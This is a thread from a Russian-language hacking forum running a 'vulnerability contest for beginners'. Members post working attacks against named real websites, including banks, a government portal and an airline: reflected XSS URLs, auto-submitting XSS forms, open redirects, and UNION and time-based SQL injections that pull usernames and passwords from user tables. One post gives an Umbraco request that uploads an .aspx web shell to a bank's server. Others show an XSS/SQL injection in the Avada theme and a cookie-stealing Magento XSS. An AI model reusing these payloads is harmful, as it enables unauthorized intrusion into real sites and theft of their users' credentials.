Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    19
    Reputations:
    1
    Сайт: https://www.silhouettedesignstore.com/
    Уязвимость: Reflected XSS (циклящийся (понаблюдайте за страницей), можно без '"-->, но так интереснее))))
    Code:
    https://www.silhouettedesignstore.com/designs?search='"--><scRipt>alert(123)</scRipt>

    там же Frame Injections
    Code:
    https://www.silhouettedesignstore.com/designs?search=<iframe src="http://www.Bla-Bla-Bla.com/"></iframe>
    Сайт: http://getbitco.com/
    Уязвимость: Reflected XSS
    Code:
    http://getbitco.com/?ans=Error<ScRiPt>alert(123456789)</ScRiPt>


    Сайт: http://http:/bitganancias.com/
    Уязвимость: XSS
    Code:
        <form style="display:none" action="http://bitganancias.com/faucet/?r=Your_Address" method="POST">
            <input name="address" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x000DDC)&lt;/scRipt&gt;"/> 
            <input name="adcopy_response" value="manual_challenge"/> 
            <input name="adcopy_challenge" value=""/> 
        </form>
        <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
    
     
  2. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    19
    Reputations:
    1
    Сайт: http://www.academyplazahotel.ie/
    Уязвимость: Reflected XSS
    Code:
    http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"--><scRipt>alert(1234567890)</scRipt>
    Сайт: http://www.cleanrooms-ireland.ie
    Уязвимость: Reflected XSS
    Code:
    http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"--></scRipt><scRipt>alert(1234567890)</scRipt>
    там же: (?redirect?)
    Code:
    http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
    Сайт: http://forums.somethingawful.com
    Уязвимость: Reflected XSS
    Code:
    http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25<acx><ScRiPt%20>alert(1234567890)</ScRiPt>
    Сайт: http://www.zoommoola.com
    Уязвимость: Reflected XSS
    Code:
    http://www.zoommoola.com/?ref='"--><scRipt>alert(1234567890)</scRipt> 
    Сайт: http://www.usatestprep.com
    Уязвимость: Reflected XSS
    Code:
    http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%<acx><ScRiPt >alert(123456)</ScRiPt>
    Сайт: http://txbra.org
    Уязвимость: XSS
    Code:
      <form style="display:none" action="http://txbra.org/results13/index.asp?page=race" method="POST">
            <input name="submit" value="Go"/>
            <input name="cbo" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1234567890)&lt;/scRipt&gt;"/>
        </form>
        <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
     
  3. Jup1ter_

    Jup1ter_ New Member

    Joined:
    27 Nov 2015
    Messages:
    19
    Likes Received:
    4
    Reputations:
    6
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    884
    Reputations:
    363
    актуален, времени пока нет разгрести. позже всем добавлю
     
    _________________________
  5. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Remote Code Execution
    Сайт: ecb.md
    Эксплоит:
    Code:
    POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
    SOAPAction: "http://tempuri.org/SaveDLRScript"
    Content-Type: text/xml
    Host: ecb.md
    Content-Length: 710
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
            <SaveDLRScript xmlns="http://tempuri.org/">
                <fileName>/..\\..\\..\\umbraco\\shell.aspx</fileName>
                <oldName>string</oldName>
                <fileContents>
    
    Код шелла .aspx,в burpsuite выбираем
    Convert selection->Html->Html encode key characters
    так прошел через фильтрацию
    
    </fileContents>
                <ignoreDebugging>1</ignoreDebugging>
            </SaveDLRScript>
        </soap:Body>
    </soap:Envelope>
    Заливается тут ecb.md/umbraco/shell.aspx
     
    Gorev, lisvan, grimnir and 2 others like this.
  6. chatanti

    chatanti Member

    Joined:
    13 Jul 2011
    Messages:
    30
    Likes Received:
    14
    Reputations:
    0
    зашел на ecb.md, стало страшно, ушел)
     
  7. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Месныи банк )
     
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    784
    Likes Received:
    912
    Reputations:
    58
    Вы уже всё сделали

    PHP:
    http://www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-
     
    Filipp and AAI like this.
  9. AAI

    AAI Member

    Joined:
    27 Dec 2015
    Messages:
    16
    Likes Received:
    7
    Reputations:
    1
    BabaDook likes this.
  10. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    9
    Reputations:
    6
  11. AAI

    AAI Member

    Joined:
    27 Dec 2015
    Messages:
    16
    Likes Received:
    7
    Reputations:
    1
  12. nordwarrior

    nordwarrior New Member

    Joined:
    12 Dec 2015
    Messages:
    13
    Likes Received:
    2
    Reputations:
    2
    SQL-i, обход mod_security
    Code:
    http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NAME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/
    
     
    Zen1T21 likes this.
  13. lastbyte

    lastbyte New Member

    Joined:
    11 Feb 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    1
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    884
    Reputations:
    363
    небольшие проблемы с хостингом и рейтингом, пока восстанавливаю
     
    _________________________
  15. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Сайт: http://www.bri.gov.md/panel/login.php
    Уязвимость: Отменяем редирект
    Эксплойт:

    Сайт: http://www.stroika.md/
    Уязвимость: SQL injection
    Эксплойт:
    Code:
    http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
    Сайт: http://www.calidus.ro/
    Уязвимость: SQL injection
    Эксплойт:
    Code:
    http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FROM+users
    Сайт: http://lukoil.md/ro/search_result
    Уязвимость: SQL injection (Post SQL-inj в поиске)
    Эксплойт:
    Code:
    -1' UNION SELECT 1,2,user(),4,5,6 -- 
    Сайт: http://mobile.airmoldova.md/
    Уязвимость: SQL injection
    Эксплойт:
    Code:
    http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,11,12,13,user_password,15,16,17,18,19,20,21,22,23,24,25+FROM+users+--+
    Сайт: http://www.infocom.md/
    Уязвимость: SQL injection
    Эксплойт:
    Code:
    http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),version()+--+
    Сайт: http://investigatii.md/
    Уязвимость: SQL injection
    Эксплойт:
    Code:
    http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14
     
    #116 Octavian, 19 Feb 2016
    Last edited: 19 Feb 2016
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    784
    Likes Received:
    912
    Reputations:
    58
    Невидимая ЭскуЭль инъекция
    PHP:
    http://parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-
    АштиМиЭль Всовывание
    PHP:
    http://shops.ixi.ua/goods.php?goods=<h2>hello<br>mir</
    И щё адна ЭскуЭль встафка аснована на времени
    PHP:
    http://www.bdsm.com.ua/shop/index.php?bdsm=cat&sort=1+and+sleep(123)&val=11_266 
    Так же гагичэски правда иль лош
    PHP:
    http://www.bdsm.com.ua/shop/index.php?bdsm=cat&sort=1+and+1=1&val=11_266
     
    #117 BabaDook, 6 Mar 2016
    Last edited: 6 Mar 2016
  17. blacKK

    blacKK New Member

    Joined:
    13 Mar 2016
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
     
  18. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    317
    Likes Received:
    476
    Reputations:
    146
    Тема для Wordpress

    Avada #1 Selling Theme of All Time
    (190,000+ Satisfied Customers)
    inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) )


    ./includes/woo-config.php

    PHP:
         if ( isset( $_SERVER['QUERY_STRING'] ) ) {
           
    parse_str$_SERVER['QUERY_STRING'], $params );
         }
         
    $order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';
         
    $order strtoupper$order );

         
    $args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}$wpdb->posts.post_date DESC";

    Получается Time-Based Blind SQL Injection:


    В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего, <= 4, включая последнюю. Точно не проверял.
     
  19. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    317
    Likes Received:
    476
    Reputations:
    146

    Magento Downloader - 1.x

    Reflected XSS



    HTML:
    <html>
       <body onload="document.forms.hidden.submit();">
         <form id="hidden" method="POST" action="http://host/downloader.php?action=checkdb">
           <input name="host" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
           <input name="username" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
           <input name="password" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
         </form>
       </body>
    </html>
    
    

    ./downloader.php:

    PHP:
      public function validateAction()
      {
    ...

      if (isset(
    $_GET['action']) && $_GET['action'] == 'checkdb') {
      
    $this->_session['host'] = $this->_helper->getPost('host');
      
    $this->_session['username'] = $this->_helper->getPost('username');
      
    $this->_session['database'] = $this->_helper->getPost('database');

    ...

      public function 
    getPost($key null$default null)
      {
      if (
    is_null($key)) {
      return 
    $_POST;
      }
      if (isset(
    $_POST[$key])) {
      return 
    $_POST[$key];
      }
      return 
    $default;
      }
    ...

      
    $this->_helper->printHtmlValidateBlock($this->_session);

    ...

      public function 
    printHtmlValidateBlock($session)
      {
      
    $host  = isset($session['host']) ? $session['host'] : 'localhost';
      
    $username = isset($session['username']) ? $session['username'] : '';
      
    $password = !empty($session['password']) ? '******' '';
      echo <<<HTML
      <div class="connection">
      <fieldset class="fieldset">
      <legend>Database Connection</legend>
      <div class="legend">Database Connection</div>
      <div class="input-box">
      <label for="host">Host </label><br />
      <input value="
    {$host}" type="text" name="host" id="host" class="input-text" />
      </div>
      <div class="input-box">
      <label for="username">User Name </label><br />
      <input value="
    {$username}" type="text" name="username" id="username" class="input-text" />
      </div>
      <div class="input-box">
      <label for="password">User Password </label><br />
      <input value="
    {$password}" type="password" name="password" id="password" class="input-text" />
      </div>
    HTML;
      echo 
    $this->printHtmlButtonSet(array('checkdb'=>'Check for InnoDB support'));
      echo <<<HTML
      </fieldset>
      </div>
    HTML;
      }

    FPD

    ./downloader.php:

    PHP:

      
    protected function _setConnection($host 'localhost'$username ''$password '')
      {
      try {
      
    $dsn 'mysql:host=' $host ';';
      
    $this->_connection = new PDO($dsn$username$password);
      } catch (
    PDOException $e) {
      
    $this->addError('Access denied for user ' $username '@' $host);
      }
      return 
    $this;
      }

     
Loading...